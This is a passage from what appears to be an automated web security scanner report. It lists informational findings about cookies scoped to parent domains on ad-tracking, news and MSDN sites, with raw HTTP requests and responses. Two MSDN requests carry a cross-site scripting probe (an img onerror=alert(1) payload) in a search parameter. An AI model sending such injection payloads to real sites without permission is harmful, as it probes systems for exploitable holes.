Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb; itc=CAPITALONE11NZZZDN1QSWZD4; mbox=check#true#1311366883|session#1311366822807-148063#1311368683|disable#browser%20timeout#1311370442

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Date: Fri, 22 Jul 2011 20:40:58 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: COUNTRYCODE=USA; path=/;HttpOnly
Set-Cookie: TestCookie=OK; expires=Sat, 30-Jul-2011 00:40:58 GMT; path=/
Set-Cookie: ssotgt=f2eos; domain=capitalone.com; path=/;HttpOnly
Set-Cookie: C1_REDIRECT=; path=/;HttpOnly
Set-Cookie: SSP_Params=; path=/;HttpOnly
Set-Cookie: VS_COOKIE=Login; domain=capitalone.com; path=/;HttpOnly
Vary: Accept-Encoding
Content-Length: 23941

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="HTMLHEAD">
<meta http-equiv="Cache-Control" content="no-cache, no-sto
...[SNIP]...

10.156. http://showadsak.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showadsak.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

pubfreq_26922_21908_683019572=165-1; domain=pubmatic.com; expires=Thu, 21-Jul-2011 18:40:54 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25659&siteId=26922&adId=21908&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.myyearbook.com/advertising/default.php&frameName=http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922&kltstamp=2011-6-21%2013%3A1%3A0&ranreq=0.5989337249714323&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; PUBRETARGET=2114_1326806725.82_1405863486; KRTBCOOKIE_22=488-pcv:1|uid:4146544210108361256

Response

10.157. http://sitelife.boston.com/ver1.0/Direct/Jsonp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.boston.com
Path:	/ver1.0/Direct/Jsonp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=l3vm104l3pluckcom; domain=boston.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Direct/Jsonp?r={%22Requests%22%3A[{%22ArticleKey%22%3A{%22Key%22%3A%2220110723_1052263300%22}}]%2C%22UniqueId%22%3A0}&cb=bcOverCom&noCacheIE=1311428812606 HTTP/1.1
Host: sitelife.boston.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW804GIB4AATB3; s_vi=[CS]v1|2703101A8516139C-400001A3C00CA954[CE]; anonId=c78dd2a2-2fd6-478d-a9a0-c99ad34539e3; mbox=check#true#1311428842|session#1311428781592-195064#1311430642|level#10#1321796782|traffic#true#1321796782|PC#1311428781592-195064.17#1312638385; __unam=b6206f2-130c7ed914a-12883c53-5; RMFD=011QkcXHO1060Og; sslife=1; s_cc=true; s_pv=Lifestyle%20%7C%20Other%20%7C%20Facebook%2C%20Twitter%20obligations%20persist%20during%20vacations; s_sq=%5B%5BB%5D%5D; AxData=; Axxd=1; bcpage=6; s_ppv=27

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 837
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm104l3pluckcom
Set-Cookie: SiteLifeHost=l3vm104l3pluckcom; domain=boston.com; path=/
Date: Sat, 23 Jul 2011 13:49:22 GMT

bcOverCom({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"07/23/2011 09:46:19:067 AM"}],"Responses":[{"Article":{"ArticleKey":{"Key":"20110723_1052263300"},"Section":{"Name":"'globe story
...[SNIP]...

10.158. http://social.msdn.microsoft.com/Search/en-US previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.msdn.microsoft.com
Path:	/Search/en-US

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 04:45:34 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Search/en-US?query=84e17%3Cimg%2520src%253da%2520onerror%253dalert(1)%3E8704c19d382%3D1&Refinement=123&ac=8 HTTP/1.1
Host: social.msdn.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/vstudio/ff431702.aspx
Cookie: WT_FPC=id=173.193.214.243-3409883184.30164746:lv=1311385526307:ss=1311385526307; MUID=1FDD375D440B439987A467BECD35D2C6; MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/22/2011 15:42:09&Microsoft.VisitStartDate=07/22/2011 15:42:09&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=32&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; MC1=GUID=7d82853ea5283f499a9e3add3769434b&HASH=3e85&LV=20117&V=3; A=I&I=AxUFAAAAAADHCAAAdQ+MX09BAsRu9umGsxl6kw!!&GO=244; omniID=1311187255305_231e_6145_d5f9_14f277e18b3d; WT_NVR_RU=0=technet|msdn:1=:2=; msdn=L=1033; mcI=Thu, 28 Jul 2011 23:10:45 GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_NVR=0=/:1=en-us:2=en-us/vstudio

Response

10.159. http://social.msdn.microsoft.com/search/en-US/en-USebb6e previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.msdn.microsoft.com
Path:	/search/en-US/en-USebb6e

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 04:54:12 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search/en-US/en-USebb6e HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://social.msdn.microsoft.com/Search/en-USebb6e%20a%3db2dac2458762?query=84e17%3Cimg%2520src%253da%2520onerror%253dalert(1)%3E8704c19d382%3D1&Refinement=123&ac=8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: social.msdn.microsoft.com
Proxy-Connection: Keep-Alive
Cookie: A=I&I=AxUFAAAAAAB3CAAAgcVmZd5G6L3BAISOia0DUg!!; MSID=Microsoft.CreationDate=07/07/2011 15:17:00&Microsoft.LastVisitDate=07/23/2011 04:54:06&Microsoft.VisitStartDate=07/23/2011 04:54:06&Microsoft.CookieId=5f269ddf-903a-4297-aeeb-cca051ae84b8&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=7&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0052-6728-5832-1105; MC1=GUID=9f4507fc155a574cb422f82242928527&HASH=fc07&LV=20117&V=3; omniID=1310166844969_ad13_25fb_5a74_7dddf20c48a3; WT_FPC=id=173.193.214.243-3932679216.30162104:lv=1311283591719:ss=1311283591712; WT_NVR_RU=0=technet:1=:2=; msdn=L=1033; MUID=3320E7738B0764152F29E55B8F07641E; s_cc=true; s_sq=msstomsdn%2Cmsstomsdnsearch%3D%2526pid%253Dsocial.msdn%25253A/search/en-usebb6e%25252520a%2525253db2dac2458762%2526pidt%253D1%2526oid%253Dhttp%25253A//social.msdn.microsoft.com/search/en-US/en-USebb6e%2526ot%253DA%2526oi%253D120; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=0a5f0a68-2007-4a70-bf6f-1327a038b2c3&Microsoft.CreationDate=07/23/2011 04:54:06&Microsoft.LastVisitDate=07/23/2011 04:54:06&Microsoft.NumberOfVisits=1&SessionCookie.Id=7B453F107B39934ED06646F81EF53849; MS0=d4013204c5c94dfcab27f527769f3ab8

Response

10.160. http://sync.adap.tv/sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.adap.tv
Path:	/sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rtbData0="key=turn:value=4146544210108361256:expiresAt=Thu+Jul+28+06%3A37%3A58+PDT+2011:32-Compatible=true,key=tidaltv:value=92c08058-8f00-46cd-96c5-b9929eaefbf9:expiresAt=Tue+Sep+20+21%3A48%3A36+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Tue, 31-Mar-2043 06:35:16 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?type=gif&key=tidaltv&uid=92c08058-8f00-46cd-96c5-b9929eaefbf9 HTTP/1.1
Host: sync.adap.tv
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: adaptv_unique_user_cookie="7419174845235780020__TIME__2011-07-22+21%3A48%3A28"; rtbData0="key=turn:value=4146544210108361256:expiresAt=Thu+Jul+28+06%3A37%3A58+PDT+2011:32-Compatible=true"; adaptv_page_url=M3h9qeyoFhilJJ6HSKW-InPHBacY8pXAtMzCifxgdT-UiDx/4EkPRWTXLbfiCqu7pHS8vxoWeQv0nianaroGVLMSBFF8IRjleDt5svGVSjdzjPt624rG5HUu/qywG1feoOt0lqLFswM_

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: image/gif
Connection: Keep-Alive
Set-Cookie: rtbData0="key=turn:value=4146544210108361256:expiresAt=Thu+Jul+28+06%3A37%3A58+PDT+2011:32-Compatible=true,key=tidaltv:value=92c08058-8f00-46cd-96c5-b9929eaefbf9:expiresAt=Tue+Sep+20+21%3A48%3A36+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Tue, 31-Mar-2043 06:35:16 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

10.161. http://sync.mathtag.com/sync/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ts=1311273774; domain=.mathtag.com; path=/; expires=Fri, 20-Jul-2012 18:42:54 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync/img?redir=http%3A%2F%2Fimage2.pubmatic.com%2FAdServer%2FPug%3Fvcode%3Dbz0yJnR5cGU9MSZjb2RlPTM2MiZ0bD00MzIwMA%3D%3D%26piggybackCookie%3Duid%3A%5BMM_UUID%5D HTTP/1.1
Host: sync.mathtag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25659&s=26922
Cookie: uuid=4dc0222e-3ec1-3315-901d-9f5b34470a53; ts=1311255527

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x4 pid 0xf76 3958
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Thu, 21 Jul 2011 18:42:54 GMT
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM2MiZ0bD00MzIwMA==&piggybackCookie=uid:4dc0222e-3ec1-3315-901d-9f5b34470a53
Etag: 4dc0222e-3ec1-3315-901d-9f5b34470a53
Connection: Keep-Alive
Set-Cookie: ts=1311273774; domain=.mathtag.com; path=/; expires=Fri, 20-Jul-2012 18:42:54 GMT
Content-Length: 0

10.162. http://tags.bluekai.com/ids previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/ids

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=kD7giLV5c/WBvF/1; expires=Tue, 17-Jan-2012 19:32:58 GMT; path=/; domain=.bluekai.com
bkc=KJyfh1U9ycm/QDsZPLmwiRs5THYxqXKB0G2Cx4OU9dZqBp1y2s53IeW01/e8N3tG4JObseXUue9l1eOA/waOXMeI43ObE3e26DMXDf3G4JObsaImkTWCxoVHRq6tQF2sMxsaeN/wTddiRtY/Fz7/D/wWM6eMCyn+xmSe21wT7WY8F51jsW3HIY7B3cpcOkxIi/qhQD8MLvraXJZQde9rPcTGsC2AwTMwesxe9B+KwuX=; expires=Tue, 17-Jan-2012 19:32:58 GMT; path=/; domain=.bluekai.com
bkst=KJhMR5Mwhz9QyreG3sL99RSVhGqZOCRZHrqHZHoIn90cQw/3emSoCZAZvDRsrGAVSuSbJQRohg3VvHqZrZqJSDRZJLRo3jjsO3d3xmgkKOARKOi1/XoB9fnuEDlvL7nUStFT9xOg6O4q; expires=Tue, 17-Jan-2012 19:32:58 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ids?dest=132&id=7e1f4d20-a8f4-40d3-9d87-6cf2443de920 HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn.interclick.com/bkdp.aspx
Cookie: bkp1=; bku=qxW99BY4DAtkc89a; bkw4=; bklc=4e282b73; bk=Six8UXV5c/WBvF/1; bkc=KJhqpzU9LcAp96BdoGR4/y1eytGQlfGPkHdeQre79Q7ZOQSseYxIuOfsly2DplZ/QuWSiU2va8DwDQdM0dW01WuG1MvLN6qylbQhGwOObZcXUly1enWlsHk3AwQHSwhxGOl/4JOIsJXEvn5lmQBevH/doHZPf2i90Q4H1efxSxht+H9IW8x4hGUve6UMQIycXjZOq9eEFpR1; bkdc=res; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101PbFgKWc9WR0OjL=; bkst=KJhMR5Mwhz9QyreG3sL99RSVhGqZOCRZHrqHZHoIn9h0F9y1w9psWKVZ9P7ooijkVq7g+EUX9OtMYfT=

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:32:58 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=kD7giLV5c/WBvF/1; expires=Tue, 17-Jan-2012 19:32:58 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJyfh1U9ycm/QDsZPLmwiRs5THYxqXKB0G2Cx4OU9dZqBp1y2s53IeW01/e8N3tG4JObseXUue9l1eOA/waOXMeI43ObE3e26DMXDf3G4JObsaImkTWCxoVHRq6tQF2sMxsaeN/wTddiRtY/Fz7/D/wWM6eMCyn+xmSe21wT7WY8F51jsW3HIY7B3cpcOkxIi/qhQD8MLvraXJZQde9rPcTGsC2AwTMwesxe9B+KwuX=; expires=Tue, 17-Jan-2012 19:32:58 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMR5Mwhz9QyreG3sL99RSVhGqZOCRZHrqHZHoIn90cQw/3emSoCZAZvDRsrGAVSuSbJQRohg3VvHqZrZqJSDRZJLRo3jjsO3d3xmgkKOARKOi1/XoB9fnuEDlvL7nUStFT9xOg6O4q; expires=Tue, 17-Jan-2012 19:32:58 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 22-Jul-2011 19:32:58 GMT; path=/; domain=.bluekai.com
BK-Server: 1c6d
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

10.163. http://tags.bluekai.com/site/2731 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2731

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bklc=4e2ad0c6; expires=Mon, 25-Jul-2011 13:46:46 GMT; path=/; domain=.bluekai.com
bk=Mu2wa33Jr4td8JkA; expires=Thu, 19-Jan-2012 13:46:46 GMT; path=/; domain=.bluekai.com
bkc=KJh5NWN/PaWDOdedztqusq2nea/A0JJH66u/wA9HPyRMRGtT6YHo+vvVZSuCjZbZQAhus3xVBut0LoGQShWGAqugMPaxZXywsWx+0yIupo7op7F7nrRBwIb8288ff7+7h9VWxLYfed7POG9HXrWIbxSfburJym36QjnDpJC7TbVgbVzNpN5t673FCbHw2AoU5WFpFf/deHCyh1c2mYkZmIPMBKI77J11NmXtAJA2ffaCqJ95lQBCMkzK+9Wo+aTCtRsx7IluFe5cIZznCJzNntZIKWQbx4w3xKkapEX62IIUF3sjpbKXuwVXHF4NlmK1N/5+VTayES/6pN5IZ9/Dwe/ySFWFrpEcvp5E4VFpenuVm3FMDO+hMVSmP8bQdj/ZQ1YObchtVS/6h0L7JysqSxRbi6ldtunBXzGIKQEEvS4QoA48FZSmPl8OKlr5OLRYor4GdqsSTblKOZZqhK+mTBVbQ5FMspsdNBypJUNOXt7BQuA/U2jX+WIbD7BbrdHzLlHxz84ZRXKkLfjnpljJMd3ArUfvqICIWIMIfNSjfZ0D87Mke3gFJ+lljBsshTPpWqKtxECd7fHqztsVBv2FB5I4NzXrD58AsX8sdY9grgXBMHWcBuINxpMzn1lNWrBDgTTvXlhakmI2XQNwcmvHuof8E52XKUuz4SHDZFBU8FAC03K3mmGrOdVUKk3M0cuEUqgOR7gPDDq7lE3l87cebteUrD0F6d4KIBk9OgAmUyhtFVRFhPFBb0FpK+fdbIDCcBZwh8U73E2TQyjVa2qGdeAHFdJeZmmPJ0Mo6HlDJXiH4AswJ8G8UFkFwJOndq7ujl3UjG8U5kYrf6K9MXLg1qdPleAL4DjpE6ObKWCbIoq6p/e6PXt4Bs44kWfU7vpjggZMUdgX5KZkUrZuesZrkdJEXrxT4R1VOpEFpJUZIzorb+dIJQwCJ5m7L3HqBwBX8Hw6rc1PInbTxr2cNe0r7We28hFNyTvaSe0fo6tbVpwwPdTcysLo+9==; expires=Thu, 19-Jan-2012 13:46:46 GMT; path=/; domain=.bluekai.com
bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101E8txzLwv1790oYUsJIj/LBQjsOGSsO3SsoGSVHrRsaZjsCAjQ/AeY6BnxhQikZ9iGkHYyYuvCkf; expires=Thu, 19-Jan-2012 13:46:46 GMT; path=/; domain=.bluekai.com
bkw5=KJha6nNnxkWROFe75/w6sAs6a/JeQPYutBqcoW+O/Rg6eNhYzsLgin9wtGwQOrWDtvg5CYM3lfiMATjextoemWEFXhbC8UKTfdmK288ptiA9qQOUkAwDNQYe3w+bY0EVoRxsgQtxh+/VANjLEZ3j7Blp/zLIf74d26p+usAbyBLWA1EfBCw4bjKOsI7vZxe4mi6FUTLTiuN7/vbGS5alrCF6udNH/8F9vagNSal+KKpd2eYKfELe5PCZm7F1+vXI7Zo7aUvIfOA2rsHwbRoKCwxrjWX2qLxc2u7mDbXZMvuPAObo80cgqG4m5aC8c+WULq/7BTXWbe799gJ8l+0KoPuyuU1uZ15FyuSzBHy7uUZ+aaoaINgXfhdE4al/; expires=Thu, 19-Jan-2012 13:46:46 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2731 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=cQ6991Cf6W6Oh0NB; bko=KJ0f/zM91YmP6TIHTxXF96mb1RMaJXp9zaXcha/DQqstx1VRss8y1eYTvf9OVUJXe9hEaFlpjVV/aRuyVOCt9BU+ZwUwk87OZh4sDGK0OOCZze1ypepTt8KHTxTFC1UvzORG+L/ahJgWO7sn/W1C6nhkxeWZCiSQqjfb/BjWqCCnsSMrrOf/kBBz1JR3nTxk0OempLYxvFXnvvRe51rw5pIOneNZOGSn7ffbzM/y9WlV9g/RsKvWsOC6jaTYpDFACqORs4vOKok4w94vJF9y11x2Kxj6FHSz5RA4yQvSp9+MuxneTalynSYLnJ9PLwWb19y93A5U4y==; bkst=KJhBMf+vQ6WxCqz/iYRhQZOojErbk275VuhWu/GWWMxRiJUL8xI/AaEHh+/c6BqspLJsX9WW4xJ4yX8vDO+lDtV3TEep7UB3fcVBLHNZPEYOKy4KS9FG+9mvimY+MaWAnSDJe2td4Gt284LPBo2KEs5U6X5tA5TUYJGWUuA4QjHUQeabGmx+t/ZLLcns/1PfVClDt1z0T7Kl/nb0+1A/75svsIVAPkJgTrSkvCI+mL+p5NOmqIgaePwiBAuY0+A9xk9WkSG/BkeD1E10HfutXZIpD59vJDKCJVgJLTciovdlY73f0Pie6VDX7hdlIrBhffxpStE2LNkLAMwKWkj9MQ+9Z0oyvKP+TGuwxxA+Wn2dz3072z/8mC0KeegeL2sGtl8KHBd4VYofZhFX9NafVp1=; bkw5=KJ05kP+GPazDCFdMsm186TqsVbyH6SoH1XkAMOWEHjtJjY/prRylnvvJhCehHHx3Y3cWV02whx+mifxFOo10/gqET/tGiv/IaigOOhs3LPCGXH/H0DBygqlmL1XTK0Q6eILyIz8KKbldUlr4xl19mwNybnWjfxLOYfjpfU+QhlpbNXHIlv4c1Cym1m7tP8xY7HTuhMsUn9GOOKDbt0RXg5njhky0jQaELEt3uqPSlyFILdec1GTapL0Ec8/ccF/TyB7uSoI2IcshpMjz95EqdViM4KqCqEUQzbrVYgF28ucEV2pOgNdZ/fIPV7k/An/BPm3rspODgS+jUiPgVv7PrnZDaeJD/pFnngAg1grR0EX28Jucq1aQeVOMNafpauCrDwc/W1zpvrTKLiQKDwsyio5cmPbkVW7fcva1Hlt9cyalebfHEnCr1IaKpsHHlZpOF/xP1hwr76Z27UjJlE3Q6vC06v1Ng813wNfi7q/2foE5mxXXJYPOmNSxTtURPSFgdl3oWajXYPfDbi3d2j9vdm+jz6vHaegoLxleiQpTJ2mFBJWGAqJhyshWbMu8oWQd4i2AENzo1Z3UkkYc+PhFYgKG+GD/gcePb9OZvU/HhTAW1UKap+jxvlw0399GhgTR7TlzYKkjvHtXDK+cPAFZwkn3yA3+HytKgBJ54h1sr3jnqhqIeLrKj95rCqDKSfWNG+4z2oeNzYJS3z5CDRoJspjc59KCKM7l4b7f8Vhz7fEEe5hNnyjJylsRNLyAbjrTccM5Gw5JReY3jlo7PwEQEZ4Qh7Xu7CypTEA0AteKqe0O5bB0ANfh6yB4HnDb2hHJvPvWdPc5pbPsZx7t2pm6BloZRit+Iui+BYMe2DjjXb3njMEsbFECz0/ElWAUWGForb1sCEcp4j7fPARw1tW2pYuRBhFg/uuPHzE8cUaHvApkmhinbVA8HSEKugFptCJ7PUnw45nlg/fMuhU43zC3M+G2cHpw34iX9IToW7VuF+z3M7xhnEf/2BUOfaFW5ivcmcRKB5tll48poj7p/fGA4jVpn1127wx8yh0nCgwF8edMX7VjxGXNrmSjIRNBGr17Y2iNDJwjr20l1+bjY55GJLsXtPQc/SAL/+f+qZnF67CmaXv7inE/hnvSgzlibZyiJxQNbdkwvBvg0cCDKzfpp60LwgVwC5wBGQ5f6B13+4cJZ/BTxgbt4enW6ThltoczaDPDtzRt6Nh/h4dFrdo538pZUXReAf9o/xgyrCdzYFCmnD5fyrhCfkLjeXtWwEuERB8LfmsjPFsxuumtJqucw07u368ZYUS3mZlcxFqXq6i/62p75/084q/S/0fCqNy99IFWEpTJfyaLtIi6; bk=v6ieEGNP5Frd8JkA; 